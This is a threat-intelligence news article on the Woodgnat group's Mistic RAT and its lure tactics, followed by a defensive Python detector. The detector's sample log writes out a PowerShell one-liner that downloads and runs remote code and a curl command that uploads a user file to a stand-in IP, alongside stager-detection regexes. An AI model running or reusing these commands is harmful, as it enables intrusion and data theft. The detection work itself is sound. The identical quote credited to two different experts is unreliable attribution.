Threat Intelligence, Jun 26, 2026

Woodgnat Hackers Use Mistic RAT to Broker Access for Ransomware Gangs

Woodgnat hackers use Mistic RAT to broker network access for ransomware gangs.

Summary

A new remote access Trojan (RAT) called Backdoor.Mistic is being used by the Woodgnat hacking group to compromise corporate networks. These actors act as initial access brokers, selling entry points to ransomware gangs like Qilin and Black Basta. The group employs social engineering tactics, including fake technical alerts via hijacked websites and deceptive Microsoft Teams messages, to trick employees into running malicious commands.

Full text

Woodgnat Hackers use Backdoor.Mistic, a stealthy RAT, to let brokers compromise networks and sell entry points to ransomware groups, putting firms at risk.

by Deeba Ahmed, June 26, 2026

A newly discovered remote access Trojan (RAT) called Backdoor.Mistic (the Mistic backdoor), tracked by Zscaler as MLTBackdoor, is helping hackers infiltrate corporate networks. Detected in April 2026, this RAT is used by a specific group to set up hidden entry points inside businesses. Instead of disrupting systems themselves, these actors operate as brokers, selling network access to major ransomware operations.

Security firms including Broadcom's Symantec team, Carbon Black, Zscaler, and ThaiCert have been tracking this activity. They linked the campaign to a group active since May 2024 known as the Woodgnat hackers (aka KongTuke). Woodgnat, which also deploys a tool called ModeloRAT, acts as a middleman for ransomware operations including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. The group targets schools, insurance firms, and IT services providers opportunistically, looking for any foothold it can sell rather than picking victims for who they are.

Sneaky tricks on web browsers and Teams

To compromise a system, the hackers rely heavily on tricking ordinary employees. They hijack legitimate WordPress websites to push fake technical alerts. In a tactic from early 2026 called CrashFix, they deliberately freeze the victim's browser and display a message telling the user to copy and paste a command to "fix" the problem; the pasted command is the first stage of the infection. These actors used similar browser lures in 2025 under the names ClickFix and FileFix. Since April 2026, they have also messaged staff directly on Microsoft Teams, posing as the company's IT helpdesk to get workers to run malicious commands.
A backdoor that leaves no trace

Once an employee falls for the lure, a multi-stage PowerShell chain downloads the malware. The operators install Backdoor.Mistic, which lets them manage files on the host and display fake login prompts to harvest passwords. They then use built-in Windows tools such as Net.exe and Reg.exe to map the network, and Curl to move data out.

What makes this RAT harder to catch is how it hides. It is loaded by DLL sideloading: a legitimate, signed Windows executable is made to load the attacker's DLL from alongside it, so the backdoor runs inside a process that security tools already trust. The backdoor also runs entirely in memory rather than writing its payload to disk, which leaves little for file-based antivirus to scan. If the operators believe they are about to be detected, a built-in kill switch makes the malware delete itself.

With such quiet tooling readily available to criminals, organisations should watch for unexpected "IT support" messages and for unusual commands being run on endpoints, and treat them as urgent, since the access may be sold on before the intrusion is noticed.

Experts' Comments

Experts say this threat highlights how organised the online underworld has become. In comments shared with Hackread.com, Roman Sannikov, Global Research Coordinator at iCOUNTER, noted that the emergence of Mistic shows the continued industrialization of the cybercrime ecosystem. He explained that initial access brokers have become critical suppliers, specializing in finding, validating, and monetizing access.

"The C2 patterns, hosting choices, and staging behavior that Woodgnat hackers use to maintain and sell access tend to be more consistent across engagements than the downstream operators who purchase it. Defenders focused only on the ransomware payload are looking at the wrong layer. The access infrastructure is upstream of the incident, and visibility into how brokers like this operate, their routing, their reuse patterns, their handoff mechanisms, is what allows defenders to detect and disrupt before the ransomware operator ever enters the environment," Sannikov stated.

Josh Picolet, VP of Detection & Analysis at Team Cymru, also shared his perspective with Hackread.com, explaining that defenders who only focus on the final ransomware payload are looking at the wrong layer. According to Picolet, the infrastructure connecting these groups is the most durable intelligence target. He stated, "The access infrastructure is upstream of the incident, and visibility into how brokers like this operate, their routing, their reuse patterns, their handoff mechanisms, is what allows defenders to detect and disrupt before the ransomware operator ever enters the environment."
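The lure-then-discovery chain the article describes (a copy-pasted PowerShell one-liner launched from the Run dialog, a browser or a Teams-driven session, followed by Net.exe, Reg.exe and Curl under the same process tree) is exactly the sequence endpoint telemetry can catch. The following is an added example written for this page, not code from the article or from Symantec, Carbon Black, Zscaler or ThaiCert: a small Python detector that parses constructed process-creation records (field layout is an assumption loosely modelled on Sysmon Event ID 1; every pid, path, address and command in the sample log is made up) and ties each follow-up tool back to the stager through the parent-pid chain, so a lone suspicious PowerShell launch rates lower than one that is followed by discovery or exfiltration.

```python
"""
Detection sketch: user-pasted PowerShell stager (ClickFix / CrashFix / fake
Teams helpdesk lure) followed by living-off-the-land discovery and
exfiltration (net.exe, reg.exe, curl.exe) under the same process tree.

Record layout is an assumption for this example (loosely modelled on Sysmon
Event ID 1); all pids, paths, addresses and commands in SAMPLE_LOG are
constructed, not real telemetry.
"""
import re
from datetime import datetime, timedelta

# Processes a user-typed command would normally come from: the Run dialog
# (explorer.exe), a browser, or the Teams client.
USER_FACING_PARENTS = {"explorer.exe", "msedge.exe", "chrome.exe", "firefox.exe",
                       "ms-teams.exe", "teams.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Switches and cmdlets typical of a copy-paste stager one-liner.
STAGER_RE = re.compile(
    r"(-enc\w*|-w(indowstyle)?\s+hidden|-nop\w*|-ep\s+bypass|"
    r"invoke-webrequest|\biwr\b|\biex\b|invoke-expression|downloadstring|frombase64string)",
    re.IGNORECASE)
# Built-in tools the article says run once the implant is in place.
FOLLOWUP_BINS = {"net.exe", "net1.exe", "reg.exe", "nltest.exe", "whoami.exe",
                 "curl.exe", "bitsadmin.exe", "certutil.exe"}

EVENT_RE = re.compile(
    r'^(?P<ts>\S+ \S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$')

# Constructed sample: one full chain, one benign admin script, one lone stager.
# The -enc blob on the last line decodes to "whoami" (deliberately harmless).
SAMPLE_LOG = r"""
2026-04-14 09:12:01 pid=4120 ppid=1188 image=C:\Windows\explorer.exe cmd="explorer.exe"
2026-04-14 09:12:40 pid=5260 ppid=4120 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -w hidden -nop -ep bypass -c iex (iwr http://198.51.100.7/a)"
2026-04-14 09:13:05 pid=5304 ppid=5260 image=C:\Windows\System32\net.exe cmd="net group "Domain Admins" /domain"
2026-04-14 09:13:09 pid=5310 ppid=5260 image=C:\Windows\System32\reg.exe cmd="reg query HKLM\SYSTEM\CurrentControlSet\Services"
2026-04-14 09:14:00 pid=5350 ppid=5260 image=C:\Windows\System32\cmd.exe cmd="cmd /c curl -T C:\Users\jdoe\hosts.txt http://198.51.100.7/up"
2026-04-14 09:14:01 pid=5390 ppid=5350 image=C:\Windows\System32\curl.exe cmd="curl -T C:\Users\jdoe\hosts.txt http://198.51.100.7/up"
2026-04-14 10:00:00 pid=6000 ppid=1188 image=C:\Windows\explorer.exe cmd="explorer.exe"
2026-04-14 10:01:00 pid=6010 ppid=6000 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -File C:\scripts\backup.ps1"
2026-04-14 10:01:30 pid=6020 ppid=6010 image=C:\Windows\System32\net.exe cmd="net use Z: \\fs01\share"
2026-04-14 11:00:00 pid=7000 ppid=1188 image=C:\Windows\explorer.exe cmd="explorer.exe"
2026-04-14 11:00:20 pid=7010 ppid=7000 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -nop -enc dwBoAG8AYQBtAGkA"
"""


def parse_event(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "pid": int(m["pid"]),
        "ppid": int(m["ppid"]),
        "name": m["image"].rsplit("\\", 1)[-1].lower(),
        "cmd": m["cmd"],
    }


def stager_ancestor(event, by_pid, stagers, max_depth=8):
    """Walk the parent chain and return the pid of the nearest flagged stager, if any."""
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return None
        if cur["pid"] in stagers:
            return cur["pid"]
    return None


def detect(lines, window=timedelta(minutes=30)):
    """Return {stager_pid: {...}} linking follow-up tooling to each stager.

    Severity is 'medium' for a lone stager launch and 'high' once discovery
    or exfiltration binaries run beneath it inside the time window.
    """
    events = [e for e in map(parse_event, lines) if e]
    by_pid = {e["pid"]: e for e in events}   # assumes no pid reuse within the window
    findings = {}
    # Stage 1: script host spawned by a user-facing parent with stager-style flags.
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (e["name"] in SCRIPT_HOSTS and parent is not None
                and parent["name"] in USER_FACING_PARENTS
                and STAGER_RE.search(e["cmd"])):
            findings[e["pid"]] = {"stager": e["cmd"], "ts": e["ts"], "followups": []}
    # Stage 2: discovery / exfil binaries whose ancestry leads back to a stager.
    for e in events:
        if e["name"] not in FOLLOWUP_BINS:
            continue
        root = stager_ancestor(e, by_pid, findings)
        if root is not None and e["ts"] - findings[root]["ts"] <= window:
            findings[root]["followups"].append((e["name"], e["cmd"]))
    for f in findings.values():
        f["severity"] = "high" if f["followups"] else "medium"
    return findings


if __name__ == "__main__":
    for pid, f in detect(SAMPLE_LOG.splitlines()).items():
        print(f"[{f['severity']}] stager pid {pid}: {f['stager']}")
        for name, cmd in f["followups"]:
            print(f"    -> {name}: {cmd}")
```

Run as-is, the script rates the first chain high (net.exe, reg.exe and curl.exe all trace back to the PowerShell process launched from explorer.exe), ignores the scheduled backup script even though it also spawns net.exe, and rates the lone `-enc` launch medium. Two things this sketch deliberately does not cover: the Run-dialog history in `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` is a useful corroborating artifact for ClickFix-style pastes, and catching the DLL sideload itself needs image-load telemetry (Sysmon Event ID 7, a signed executable loading an unsigned DLL from its own directory), not process-creation records.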

Indicators of Compromise

  • malware — Backdoor.Mistic
  • malware — MLTBackdoor
  • malware — ModeloRAT

Entities

  • Woodgnat hackers (threat_actor)
  • KongTuke (threat_actor)
  • Zscaler (vendor)
  • Broadcom (vendor)
  • Symantec (vendor)
  • Carbon Black (vendor)